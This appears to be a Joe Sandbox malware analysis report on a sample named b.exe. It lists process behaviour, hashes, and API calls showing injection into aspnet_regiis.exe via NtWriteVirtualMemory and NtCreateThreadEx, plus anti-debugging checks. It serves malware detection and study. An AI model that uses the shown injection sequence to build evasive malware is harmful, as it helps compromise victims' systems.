2024-11-23 09:25:22 UTC	1008	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 09:25:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ilq35dbe142hiadeudefqsn5vv; expires=Wed, 19-Mar-2025 03:12:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=000RLs2t47BWAsmxWueGPTO8o1x5eMnRpJnc87GJG4HN7RdwbbvVFyGIv02ssCvW2IjPUjkwMIcQtg1Y4Dai0hNrND7G42F%2FL5HDojj%2F6bbYZfedrhdF6IXMF%2FXqPqDbWb10"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e701c8ac91b7c82-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1794&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1022&delivery_rate=1604395&cwnd=202&unsent_bytes=0&cid=01e161c638d30706&ts=709&x=0"
2024-11-23 09:25:22 UTC	54	IN	Data Raw: 33 30 0d 0a 75 64 58 2b 4f 38 47 74 6a 31 58 72 48 42 58 37 4d 34 61 7a 73 4d 33 2b 4f 69 77 66 2f 38 61 45 44 75 73 61 6e 61 35 51 7a 55 6e 69 69 41 3d 3d 0d 0a Data Ascii: 30udX+O8Gtj1XrHBX7M4azsM3+Oiwf/8aEDusana5QzUniiA==
2024-11-23 09:25:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	04:24:58
Start date:	23/11/2024
Path:	C:\Users\user\Desktop\b.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\b.exe"
Imagebase:	0x860000
File size:	716'800 bytes
MD5 hash:	1D08526FC81B1D62195F4E5DEA52BB6F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:24:58
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:24:58
Start date:	23/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0x430000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:24:59
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 1228
Imagebase:	0xdf0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	15.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.3%
Total number of Nodes:	1444
Total number of Limit Nodes:	10

Executed Functions

Function 6CDD88C0 Relevance: 102.0, APIs: 27, Strings: 27, Instructions: 7491nativememorythreadCOMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE(?,?,?,?,?), ref: 6CDDA814
ShowWindow.USER32 ref: 6CDDA82A
VirtualAlloc.KERNELBASE ref: 6CDDB035
CreateProcessW.KERNELBASE ref: 6CDDB37D
NtGetContextThread.NTDLL ref: 6CDDB6B2
NtAllocateVirtualMemory.NTDLL ref: 6CDDB95D
NtAllocateVirtualMemory.NTDLL ref: 6CDDBAF2
NtWriteVirtualMemory.NTDLL ref: 6CDDBC13
NtWriteVirtualMemory.NTDLL ref: 6CDDC20F
NtWriteVirtualMemory.NTDLL ref: 6CDDC5B3
NtReadVirtualMemory.NTDLL ref: 6CDDD522
NtWriteVirtualMemory.NTDLL ref: 6CDDD784
NtWriteVirtualMemory.NTDLL ref: 6CDDDFC1
NtCreateThreadEx.NTDLL ref: 6CDDE3B3
CloseHandle.KERNEL32 ref: 6CDDE763
CloseHandle.KERNEL32 ref: 6CDDE8ED
GetConsoleWindow.KERNEL32 ref: 6CDDEC6B
ShowWindow.USER32 ref: 6CDDEC81
VirtualAlloc.KERNEL32 ref: 6CDDEE31
NtGetContextThread.NTDLL ref: 6CDDEEE0
CloseHandle.KERNEL32 ref: 6CDDF5B4
CreateProcessW.KERNEL32 ref: 6CDDF72D
NtWriteVirtualMemory.NTDLL ref: 6CDDF8E3
NtWriteVirtualMemory.NTDLL ref: 6CDDFA53
CloseHandle.KERNEL32 ref: 6CDDFB41

Strings

6IX, xrefs: 6CDDCB72
ntdll.dll, xrefs: 6CDDA8F5, 6CDDF5FB
Yal, xrefs: 6CDDE20A
;E-F, xrefs: 6CDDCDE1
AEf, xrefs: 6CDDEF2A
6IX, xrefs: 6CDDCBFF
@, xrefs: 6CDDBAEA
g]J, xrefs: 6CDDDEEC
[3?H, xrefs: 6CDDA9EE
kernel32.dll, xrefs: 6CDDA8E1, 6CDDF5E7
%N[, xrefs: 6CDDF937
Y, xrefs: 6CDDAF0A
%N[, xrefs: 6CDDC525
;E-F, xrefs: 6CDDCE70
En, xrefs: 6CDDE27B
En, xrefs: 6CDDE328
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, xrefs: 6CDDB23C, 6CDDF6BA
D, xrefs: 6CDDEE8B
f?}, xrefs: 6CDDCB17
+,^c, xrefs: 6CDDB277
D_`, xrefs: 6CDDAF85
g]J, xrefs: 6CDDDF5A
(z(a, xrefs: 6CDDD92E
MZx, xrefs: 6CDDA909, 6CDDA92B, 6CDDF60F, 6CDDF631
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 6CDDB186
Y, xrefs: 6CDDAF80
AEf, xrefs: 6CDDEF7B

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: Virtual$Memory$Write$CloseHandleWindow$CreateThread$AllocAllocateConsoleContextProcessShow$Read
String ID: g]J$g]J$%N[$%N[$(z(a$+,^c$;E-F$;E-F$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$D_`$MZx$Yal$[3?H$kernel32.dll$ntdll.dll$6IX$6IX$AEf$AEf$En$En$Y$Y$f?}
API String ID: 1378836336-1102560837
Opcode ID: 3487d27fc20240ab1bffbc7b7c0a5bf8edb0713c8af05e82cc41416777a5f95b
Instruction ID: 079e4cd9123fd1d0a6227029cb1ca7c3ea25a621730df821d58e140d220ecb03
Opcode Fuzzy Hash: 3487d27fc20240ab1bffbc7b7c0a5bf8edb0713c8af05e82cc41416777a5f95b
Instruction Fuzzy Hash: 55D30376E482108FCF14CF3CC9D43DA77F2AB8A355F118199D859DB7A4C236AA898F41

Function 6CDD1210 Relevance: 54.4, APIs: 21, Strings: 8, Instructions: 3612filememoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6CDD2290
K32GetModuleInformation.KERNEL32 ref: 6CDD26B5
GetModuleFileNameA.KERNEL32 ref: 6CDD27CA
CreateFileA.KERNELBASE ref: 6CDD280B
CreateFileMappingA.KERNEL32 ref: 6CDD2CA7
CloseHandle.KERNEL32 ref: 6CDD326A
MapViewOfFile.KERNELBASE ref: 6CDD339F
VirtualProtect.KERNELBASE ref: 6CDD3BEE
VirtualProtect.KERNELBASE ref: 6CDD3CAC
GetCurrentProcess.KERNEL32 ref: 6CDD41E9
GetModuleHandleA.KERNEL32 ref: 6CDD42A4
CloseHandle.KERNEL32 ref: 6CDD4396
GetModuleHandleA.KERNEL32 ref: 6CDD4547
CreateFileMappingA.KERNEL32 ref: 6CDD45F6
CloseHandle.KERNEL32 ref: 6CDD464B
GetCurrentProcess.KERNEL32 ref: 6CDD474B
CloseHandle.KERNEL32 ref: 6CDD476F

Strings

@, xrefs: 6CDD3BE2
}auZ, xrefs: 6CDD358C
'<K, xrefs: 6CDD4377
'<K, xrefs: 6CDD4775
:MB$, xrefs: 6CDD3B0B
mA=Q, xrefs: 6CDD2BEA
mA=Q, xrefs: 6CDD2B99
(j, xrefs: 6CDD2A3C

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: Handle$File$CloseModule$CreateCurrentProcess$MappingProtectVirtual$InformationNameView
String ID: (j$:MB$$@$mA=Q$mA=Q$}auZ$'<K$'<K
API String ID: 1267590279-1113462242
Opcode ID: 0f8d3d7ee240cb1e8162f399c4156862a62b92bb3ce42671e31fe026ce256bbe
Instruction ID: 988fd03497820a1d9df1812617f1f5b543ce9cd460790fdce459be48128364a7
Opcode Fuzzy Hash: 0f8d3d7ee240cb1e8162f399c4156862a62b92bb3ce42671e31fe026ce256bbe
Instruction Fuzzy Hash: F553F036F502108FCF048F3CC9953DEBBF2AB47365F128159D499DBBA5C639A9898B01

Function 6CDD6E40 Relevance: 22.3, APIs: 3, Strings: 9, Instructions: 1271
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@B_A, xrefs: 6CDD79D8
D6w_, xrefs: 6CDD747D
"m&, xrefs: 6CDD76EA
"m&, xrefs: 6CDD7613
Y(, xrefs: 6CDD7F9D
@B_A, xrefs: 6CDD795D
NtQueryInformationProcess, xrefs: 6CDD764D, 6CDD7F20
ntdll.dll, xrefs: 6CDD7639, 6CDD7F0C
Y(, xrefs: 6CDD7B12

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID:
String ID: "m&$"m&$@B_A$@B_A$D6w_$NtQueryInformationProcess$Y($Y($ntdll.dll
API String ID: 0-3531410141
Opcode ID: 771a1eb2d2c6e980a3c6793ef265c4675c97d37f821d725b039b229881a23581
Instruction ID: f312c0e2608ec424985a235a006c8792c51e820b70fc1b37b74be5b01a13b3db
Opcode Fuzzy Hash: 771a1eb2d2c6e980a3c6793ef265c4675c97d37f821d725b039b229881a23581
Instruction Fuzzy Hash: DD923536E512059FCF04CFBCC5A43DE7BF2EB42319F229515D425DB7A8D62AA90ACB01

Function 6CDE0F28 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CDE0F6F
___scrt_uninitialize_crt.LIBCMT ref: 6CDE0F89

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 0a95d5ba18ed48e0267785611021d4f6024b70cea41427ffe1a4aa4da2f12252
Instruction ID: a3387dca2b8ef902047f402b6ea8cdb82f80e7515ad8149501b8d84c4fe10f20
Opcode Fuzzy Hash: 0a95d5ba18ed48e0267785611021d4f6024b70cea41427ffe1a4aa4da2f12252
Instruction Fuzzy Hash: 8F41E372F05295EFDB219F95C800BAE3AB4EB8D7A8F014519E81567B71CB309D05EBB0

Function 6CDE0FD8 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6CDE1015
dllmain_crt_dispatch.LIBCMT ref: 6CDE102C
dllmain_raw.LIBCMT ref: 6CDE1074
dllmain_crt_dispatch.LIBCMT ref: 6CDE1087
dllmain_raw.LIBCMT ref: 6CDE109A

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 3554b2d89e5335f89a46e8e092afbb126e6340da86d4f0cd3c12ad0c06a06f2a
Instruction ID: 9156ffc67282e7a16e26d089beeaa4c9a25655aee24b9a9dc19031867e5b49c5
Opcode Fuzzy Hash: 3554b2d89e5335f89a46e8e092afbb126e6340da86d4f0cd3c12ad0c06a06f2a
Instruction Fuzzy Hash: 1F21BF72F01299EFDB214F55C840AAF3AB8EB88BD8F014115F8155BA71C730DD11EBA0

Function 6CDE0E21 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CDE0E6E

Part of subcall function 6CDE12EB: InitializeSListHead.KERNEL32(6CE40988,6CDE0E78,6CDF00D8,00000010,6CDE0E09,?,?,?,6CDE1031,?,00000001,?,?,00000001,?,6CDF0120), ref: 6CDE12F0

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CDE0ED8

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 7350e8affdccc49d090ead7a38bbf8621dfc2ca9e7f3a5f43c3ec0db61ec0b0a
Instruction ID: 9b955d0e87779593d519cbbe7fcb91615c6a643de0dc1163f4f0df06a5da39a0
Opcode Fuzzy Hash: 7350e8affdccc49d090ead7a38bbf8621dfc2ca9e7f3a5f43c3ec0db61ec0b0a
Instruction Fuzzy Hash: E621CF32745386EAEB10ABB484047DE33B0AB4E7ADF10442AD54127FF2CF61A04DD675

Function 6CDE5C4D Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6CDE5C99
GetFileType.KERNELBASE(00000000), ref: 6CDE5CAB

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 64ac300b0a698b80ebe40ab4af870b52dac1543f8039900dd5e1f7613713b8ac
Instruction ID: f6519870476137426b81b2a93e4d5d170d24ffde39afb645ee49c221545b276c
Opcode Fuzzy Hash: 64ac300b0a698b80ebe40ab4af870b52dac1543f8039900dd5e1f7613713b8ac
Instruction Fuzzy Hash: 2611B731605B52D6DB304B3E8CA4612BBE4A74F3B8F34071BD5FAC69F1E230D5868650

Function 6CDE31AD Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6CDE565B: GetEnvironmentStringsW.KERNEL32 ref: 6CDE5664
Part of subcall function 6CDE565B: _free.LIBCMT ref: 6CDE56C3
Part of subcall function 6CDE565B: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CDE56D2

_free.LIBCMT ref: 6CDE31ED
_free.LIBCMT ref: 6CDE31F4

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: fc4f19ec0946e51e28e95efbcc0053540c151e3e79cee4100dce803d788d9f7f
Instruction ID: 79b636f0abcc39350000f75cb85a7142f7c4f4ed87969fcff775b7bc5bd237ce
Opcode Fuzzy Hash: fc4f19ec0946e51e28e95efbcc0053540c151e3e79cee4100dce803d788d9f7f
Instruction Fuzzy Hash: E4E02B63A4884049D2111B3E6C016AE22200F8B33DF15832FD824CBAF0EF60890B01B9

Non-executed Functions

Function 008AF670 Relevance: 15.3, Strings: 12, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

zaB, xrefs: 008AF732
*&?$, xrefs: 008AF7E9
3HcP, xrefs: 008AF8CB
8,11, xrefs: 008AF728
7()&, xrefs: 008AF7DF
:&Dl, xrefs: 008AF7F3
=.dA, xrefs: 008AF81B
WDHZ, xrefs: 008AF71E
O'TT, xrefs: 008AF7C1
y_~), xrefs: 008AF7D5
KKPV, xrefs: 008AF714
<G24, xrefs: 008AF811

Memory Dump Source

Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_b.jbxd

Similarity

API ID:
String ID: *&?$$3HcP$7()&$8,11$:&Dl$<G24$=.dA$KKPV$O'TT$WDHZ$y_~)$zaB
API String ID: 0-2264557016
Opcode ID: 96ec30c3c7abe553a22243ae5477057a4866f16f58f8429009d8daf36cdd3193
Instruction ID: ddb3ed68d1bb2f04fd8a55c9378fee9c2ddbd8ecfd514ad7a5fdbb38a7d9a65f
Opcode Fuzzy Hash: 96ec30c3c7abe553a22243ae5477057a4866f16f58f8429009d8daf36cdd3193
Instruction Fuzzy Hash: CA91B2B0204B818BE325CF3985917A3BFE1EB97304F19896DD5EB8B792D7346406CB51

Function 008BC920 Relevance: 10.4, Strings: 8, Instructions: 429COMMON

Download Yara Rule

Strings

C, xrefs: 008BC9CE
HI, xrefs: 008BCBB4
dW, xrefs: 008BC946
R[, xrefs: 008BC956
Q:, xrefs: 008BC94E
\, xrefs: 008BC9D6
e], xrefs: 008BC93E
2zS, xrefs: 008BCAF8

Memory Dump Source

Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_b.jbxd

Similarity

API ID:
String ID: 2zS$C$HI$Q:$R[$\$dW$e]
API String ID: 0-720759029
Opcode ID: 2e2ffb56de76aa475517feb11019d0694e79c0badc04c9632dba6be4cbb34f4d
Instruction ID: de5956110c03fa29b65e06c4a2ea819640212ba883d4f7fa8ddbfb1ccbb96fc9
Opcode Fuzzy Hash: 2e2ffb56de76aa475517feb11019d0694e79c0badc04c9632dba6be4cbb34f4d
Instruction Fuzzy Hash: 68E1EAB5A08300ABE7109F24DC85B9BBBA4FF86714F14892CF695DB391D3B5D805CB92

Function 008A3090 Relevance: 8.4, Strings: 6, Instructions: 857COMMON

Download Yara Rule

Strings

O($a, xrefs: 008A322E
MKB, xrefs: 008A3994
%(Hy, xrefs: 008A32BE
'HLJ, xrefs: 008A3437
pRQK, xrefs: 008A3227
&6<, xrefs: 008A33BA

Memory Dump Source

Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_b.jbxd

Similarity

API ID:
String ID: %(Hy$&6<$'HLJ$MKB$O($a$pRQK
API String ID: 0-3891484782
Opcode ID: aa82ce53f169c3d06775f6c6747d11f23c6837c8e0fc1a2ea40f5dc1f3f18214
Instruction ID: d92e837a338e4c1b7151df5bb7ba4f3c231857a4a37985fbd09f39980ef269d3
Opcode Fuzzy Hash: aa82ce53f169c3d06775f6c6747d11f23c6837c8e0fc1a2ea40f5dc1f3f18214
Instruction Fuzzy Hash: EB5212B4504B818FD335CF39C890766BBE1FF56314B188A6DE4E68BB92C735A906CB50

Function 6CDE160A Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CDE1616
IsDebuggerPresent.KERNEL32 ref: 6CDE16E2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CDE1702
UnhandledExceptionFilter.KERNEL32(?), ref: 6CDE170C

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: d8a89335cbe690ace807de1b4c3888f36714fd1331c504d742d3937683fd4a71
Instruction ID: 626930d2b0dfe363716cd5f5acb83ea0043b222aed634ed088cbfafed4e34314
Opcode Fuzzy Hash: d8a89335cbe690ace807de1b4c3888f36714fd1331c504d742d3937683fd4a71
Instruction Fuzzy Hash: 6E3129B5E05318DBDB10EF65D9897CCBBB8AF08304F10419AE408A7250EB709A85CF14

Function 6CDDFCB0 Relevance: 5.0, Strings: 3, Instructions: 1221COMMONLIBRARYCODE

Download Yara Rule

Strings

6p, xrefs: 6CDE0936
8Bs*, xrefs: 6CDE053E
h, xrefs: 6CDE0C7F

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID:
String ID: 8Bs*$h$6p
API String ID: 0-2078908071
Opcode ID: 2a2ab5ddac38b51f388266317e875239588c3de7c02838ba22fa4d0360855ca6
Instruction ID: 7b6fd2440f2789ebb2670c55d47e682d0471aad1f6c93516797cbddc23707171
Opcode Fuzzy Hash: 2a2ab5ddac38b51f388266317e875239588c3de7c02838ba22fa4d0360855ca6
Instruction Fuzzy Hash: FB92F536E446458FCF088FBCD5D43CD77F2AB4A3A9F10C115D461EBBA4C92AA80ADB15

Function 6CDE3F9A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CDE4092
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CDE409C
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CDE40A9

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e80f3fa1f6fc1c2b03da89e00e4062d3a2fe8cb1e88e63f32cc8235ffdd753c5
Instruction ID: 30883f9388db1a9a23ee5b2ac135bae1c96d1205711aa8fca8448a7ad40fe0d0
Opcode Fuzzy Hash: e80f3fa1f6fc1c2b03da89e00e4062d3a2fe8cb1e88e63f32cc8235ffdd753c5
Instruction Fuzzy Hash: E531C474901218EBCB21DF65D9887CCBBB8BF0C314F5042EAE41CA72A0E7709B858F54

Function 6CDE2D95 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6CDE2D94,?,00000001,?,?), ref: 6CDE2DB7
